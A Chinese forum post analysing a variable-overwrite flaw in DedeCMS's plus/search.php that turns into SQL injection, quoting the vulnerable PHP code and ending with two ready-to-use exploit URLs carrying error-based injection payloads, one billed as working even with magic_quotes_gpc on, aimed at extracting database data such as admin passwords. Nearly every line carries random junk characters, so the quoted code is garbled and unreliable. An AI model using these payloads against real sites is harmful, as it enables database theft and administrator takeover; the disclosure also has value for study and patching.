微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
+ i8 \4 P# K e( h作者: c4rp3nt3r@0x50sec.org+ j l' b8 ?+ Z: ]5 J
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.5 y! p0 X5 K7 [) T: [
3 r# }9 @) r7 L3 k" h, K黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.6 F* k9 J4 q! }) W4 d% Y+ L7 L
' c8 v. J1 x: y' U8 ?============
# Y& _. d0 J' O; v$ v. E 9 v4 [& O `+ ?: e1 K$ h% S8 W# J
9 w; D, z4 h/ e( p1 b. J1 F* K
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
8 D2 S" ?+ ~/ N/ R! u5 z, y - V2 y' l- T/ \# p7 C( K. f
require_once(dirname(__FILE__).”/../include/common.inc.php”);
9 ]8 n% O5 M7 k( C+ S( r! Nrequire_once(DEDEINC.”/arc.searchview.class.php”);! \2 G1 @7 l) G! R2 ^+ V: t
" i7 i7 y( h" m) \+ n8 i$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;1 U/ d/ T8 C; z0 T7 E& E
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
3 s; x# c, V+ u1 P$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;5 o9 U& j- w J' _: U3 j
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;5 ~/ R/ F8 _3 B: K( ~% E7 N' X
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;# t& q m0 J1 s1 a% B( {# b
( `7 v& A3 g- f% o' o" D5 l% |/ dif(!isset($orderby)) $orderby=”;' y Z/ L {; Y* d) W
else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
- f2 p# Y% Q' d
- d5 W6 Z* o( g9 q' n1 M " i1 S) w* x2 W6 {) `
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;
! D$ @( v* S) ]: V Uelse $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
+ j s- L/ S1 E7 {" J
1 Q3 P; g# ]' p9 y( ]if(!isset($keyword)){
% z- O, c3 _1 a x3 V if(!isset($q)) $q = ”;3 C0 `. q' h: Q: O4 E
$keyword=$q;
4 {# F$ j' {& U" S! s3 Q( o! { K}
: C/ y! h( ~9 a( X
7 j# m/ u' s3 F$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));
, x! o5 O' [3 g: x) t3 p) F
% U3 k5 O2 m) I' n//查找栏目信息
1 Q6 X; b/ X+ Y# n: Mif(empty($typeid))
5 M& q3 K* M) ~" G. k{9 q7 ?8 ^4 _2 \9 U# c
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;
- W4 I) h5 w, a! e& ` if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
[) e! G* D% D {9 {3 @+ u9 w+ K0 ~
$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);3 ?8 i) W/ _6 K+ E8 F
fwrite($fp, “<”.”?php\r\n”);
2 ?' x1 F) H4 F! R* O% `/ S( k7 T0 J2 h $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);. t, u% V' k1 R/ d
$dsql->Execute();
% g8 V9 k5 z5 C while($row = $dsql->GetArray())
- p) S$ D1 o7 n: I' K8 _6 { {9 ]$ ^7 [: n) P* @' ~) q' {, E) s
fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);1 {7 z- G+ j' ^" y- u
}
) j' L+ A n w6 w& h- X% @# k fwrite($fp, ‘?’.'>’);
/ S& m: ^' [( F3 I' F4 G& q2 Z fclose($fp);# ]. y7 q/ [+ h B
}
( A3 C m! k- U4 S: {3 y //引入栏目缓存并看关键字是否有相关栏目内容
; |2 a$ D& Z8 o, Y' ? require_once($typenameCacheFile);
3 o4 H( R: X) R, ~, k: D//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个% h- C, x% v* r1 g0 ?
//
7 l6 H' p9 N: P0 x$ d9 n A5 r; k3 V if(isset($typeArr) && is_array($typeArr))
! V4 D8 ?+ C- _7 N0 C {
2 ~ n, C' J+ L! H foreach($typeArr as $id=>$typename)( o; P( w: N S+ c+ y4 X6 z
{
8 D6 Z: s3 P g* e# j' [3 q& p' P
/ U9 X0 |* |# j' s3 R' d; c <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
) j2 I8 b" K) F% U& B' f if($keyword != $keywordn)
+ s) c, N5 R/ A: ?7 Z9 E5 X {; |' d$ a, ^1 I) ]0 F! n4 n8 ~
$keyword = $keywordn;. p+ @- B$ w! R0 Y6 U
<font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
% T5 e, h1 Q' W/ ^ break;
- J% o% H9 D0 _' A/ i5 w) H }
8 h" H1 n" i3 S/ B }$ c. u, K- N3 Q4 X* c- M0 e3 o- u
}9 I2 K9 ~( Y; L# z- K" Q
}
7 h- a1 m" R' T3 F y/ v然后plus/search.php文件下面定义了一个 Search类的对象 .
3 x6 n4 k) }7 }/ f+ @在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
3 d7 Z$ ?$ L8 h5 _; i2 R+ R$this->TypeLink = new TypeLink($typeid);5 e2 E4 ?" l* |9 a
4 d5 m! ^/ {0 J+ m/ L/ K! h
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.! }2 c" l9 a* D+ ~& ?/ y
' c: ^0 e* p! [! u' r
class TypeLink
) |& {9 ?) P) G{
8 G( d6 h% T* P4 _: r, n var $typeDir;2 }8 Z0 u i( | [' }
var $dsql;
+ _# N5 z; ] V var $TypeID;
& n3 r$ B. s5 _6 \ var $baseDir; m9 o( S: Q- { c$ [2 e
var $modDir;+ N% Y1 q1 c5 t
var $indexUrl;* \" ]% M+ ]% }& q- ?; p! t- f# Z
var $indexName;5 ] @/ @* `. n# _# P
var $TypeInfos;; P. N, s+ ~. i/ }/ @2 y: v# W
var $SplitSymbol;
- `; @" O% a+ m var $valuePosition;
! L8 h5 y4 z: z var $valuePositionName; A1 y7 P1 S, R' q; E% N' [
var $OptionArrayList;//构造函数///////$ @2 d/ A- |/ W6 u
//php5构造函数; u# M6 `2 D9 T9 G' }* |4 Y
function __construct($typeid)- A; _8 h5 D" ]+ b! w: p3 R" r
{
$ o( N6 f* e4 D% ~2 M6 ~2 ^ $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];) E1 \ a' `; ^' l7 h# m- Y
$this->indexName = $GLOBALS['cfg_indexname'];
% }( S$ ?5 C4 ?; Z5 G7 V' i $this->baseDir = $GLOBALS['cfg_basedir'];
* E* X. }9 I, j& [ $this->modDir = $GLOBALS['cfg_templets_dir'];
0 @, E5 x" C$ o $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];! F. C G8 K0 P/ Y2 @# t% I" K
$this->dsql = $GLOBALS['dsql'];
$ r3 B# s/ A1 U4 O2 G/ l $this->TypeID = $typeid;1 A9 W+ V l0 K" V+ K
$this->valuePosition = ”;0 t% _8 D1 ~9 Z9 a1 K6 G. V3 m1 ]
$this->valuePositionName = ”;: v* r, \- T4 i e9 s' T8 b
$this->typeDir = ”;. I+ I7 Q }. f! H, F6 ?
$this->OptionArrayList = ”;
- X" |, s6 u% D3 B3 D- s4 D
) ], ] K" K) t5 {) d //载入类目信息
: S; X8 n+ r+ G8 B f( M" ^
/ s$ }6 k; V& N <font color=”Red”>$query = “SELECT tp.*,ch.typename as. r; V7 L) z) b, K7 N# ~' j
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join6 k0 U. R! e, p2 z3 {
`#@__channeltype` ch% r4 x, `4 J; ]6 q
on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
8 S. h' M H: P c0 O
8 [- O& f' r, q6 g3 I if($typeid > 0)
( Q* i9 v; ^( u {
2 X) l/ W; Q( z0 l3 g $this->TypeInfos = $this->dsql->GetOne($query);
0 B7 a) s' J4 o6 k5 l利用代码一 需要 即使magic_quotes_gpc = Off/ X+ R" @" r; p& F7 A5 a: g M
! D9 l4 `0 q5 A/ Z; J9 H
www.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title. ~' c. `+ ], e2 F; x+ j7 [
$ E, Y7 ^/ o. e) i* e# J这只是其中一个利用代码… Search 类的构造函数再往下
4 {, _7 Q4 t6 @7 ?8 u
2 { f' ?5 Q9 E5 p……省略% D1 ]9 Y7 j5 s m' ~. w" u$ \
$this->TypeID = $typeid;2 v) ^; X$ a# W# t) |' H
……省略3 e3 L! A; Z& a8 I4 a( b5 ]: n" P& Z5 M
if($this->TypeID==”0″){
) F+ a; V( i H6 y $this->ChannelTypeid=1;
& J$ p3 J" l: G% [ V) O }else{" Z9 \/ L' c, O2 R8 V
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
" u) B9 E: d% z! F/ }! y0 D//现在不鸡肋了吧亲…
# d; Z! _9 u* u1 ?$ b6 ^8 T $this->ChannelTypeid=$row['channeltype'];
9 v: s- M0 m- ?9 g, S
' V/ ]- j [5 z }
/ O6 T1 F8 C: @5 `1 j' w利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.. G, |% [2 S# L5 X
; d5 a& G# e" r. p0 v8 g
www.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title/ V6 k2 B3 @: R5 l. V/ Z* A) f& w
. f0 @% q3 p: F4 S+ O如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
! c6 G* m7 r& x" B5 y; ~ |
发表于 2013-1-19 08:18:56
收藏
支持
反对